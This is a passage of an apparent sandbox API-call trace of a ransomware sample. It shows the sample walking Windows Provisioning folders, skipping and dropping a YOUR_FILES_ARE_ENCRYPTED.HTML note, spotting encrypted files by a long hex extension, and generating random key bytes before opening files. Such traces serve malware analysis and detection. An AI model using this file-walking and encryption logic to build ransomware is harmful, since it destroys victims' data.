ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.043] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.043] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.043] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned 97 [0110.043] GetProcessHeap () returned 0x600000 [0110.043] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.043] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime" [0110.043] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*" [0110.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaec50ff3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.044] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaec50ff3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName="..", cAlternateFileName="")) returned 1 [0110.044] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa214da47, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa214da47, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2173cb2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xbd7, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.044] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.044] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.044] lstrlenW (lpString=".provxml") returned 8 [0110.044] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.044] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2199f29, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2199f29, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2199f29, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.044] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.044] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.044] lstrlenW (lpString=".provxml") returned 8 [0110.044] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.044] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1 [0110.044] StrStrIW (lpFirst="Power_2.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml") returned 113 [0110.044] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0110.044] lstrlenW (lpString=".provxml") returned 8 [0110.044] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0110.044] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec4ae5c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec4ae5c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec54b1a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.044] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec4ae5c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec4ae5c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec54b1a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f49dc, dwReserved1=0x6f4928, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.044] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.045] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.045] GetProcessHeap () returned 0x600000 [0110.045] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.045] GetProcessHeap () returned 0x600000 [0110.045] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.045] GetProcessHeap () returned 0x600000 [0110.045] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.046] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2173cb2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2173cb2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaec7cb1d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml.E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372", cAlternateFileName="RUNTIM~1.E00")) returned 1 [0110.046] StrStrIW (lpFirst="RunTime.xml.E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.046] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372") returned 166 [0110.046] PathFindExtensionW (pszPath="RunTime.xml.E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372") returned=".E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372" [0110.046] lstrlenW (lpString=".E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372") returned 65 [0110.046] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec81db9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec81db9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec86b59, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.046] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec81db9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec81db9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec86b59, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.046] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.046] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.046] GetProcessHeap () returned 0x600000 [0110.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.047] GetProcessHeap () returned 0x600000 [0110.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.047] GetProcessHeap () returned 0x600000 [0110.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.048] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec8a93b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec8a93b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec8e0da, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.048] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec8a93b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec8a93b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec8e0da, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.048] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.048] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.048] GetProcessHeap () returned 0x600000 [0110.048] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.048] GetProcessHeap () returned 0x600000 [0110.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.048] GetProcessHeap () returned 0x600000 [0110.049] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.049] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaecd4d8f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecd4d8f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", cAlternateFileName="{7A30A~1")) returned 1 [0110.049] StrStrIW (lpFirst="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.049] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned 84 [0110.049] GetProcessHeap () returned 0x600000 [0110.049] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.050] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" [0110.050] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*" [0110.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaecd4d8f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecd4d8f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.050] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaecd4d8f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecd4d8f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.050] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c629f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1c629f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaecd9b5b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1f35, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129", cAlternateFileName="CUSTOM~1.29E")) returned 1 [0110.050] StrStrIW (lpFirst="customizations.xml.29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.050] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129") returned 168 [0110.050] PathFindExtensionW (pszPath="customizations.xml.29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129") returned=".29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129" [0110.050] lstrlenW (lpString=".29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129") returned 65 [0110.050] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a2656d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a2656d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.050] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.050] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml") returned 104 [0110.050] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.051] lstrlenW (lpString=".xml") returned 4 [0110.051] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.051] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.051] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.051] CloseHandle (hObject=0x30c) returned 1 [0110.051] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed5ecb5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed5ecb5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.051] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.051] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned 89 [0110.051] GetProcessHeap () returned 0x600000 [0110.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.052] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" [0110.052] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*" [0110.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed5ecb5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed5ecb5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.052] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed5ecb5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed5ecb5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.053] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 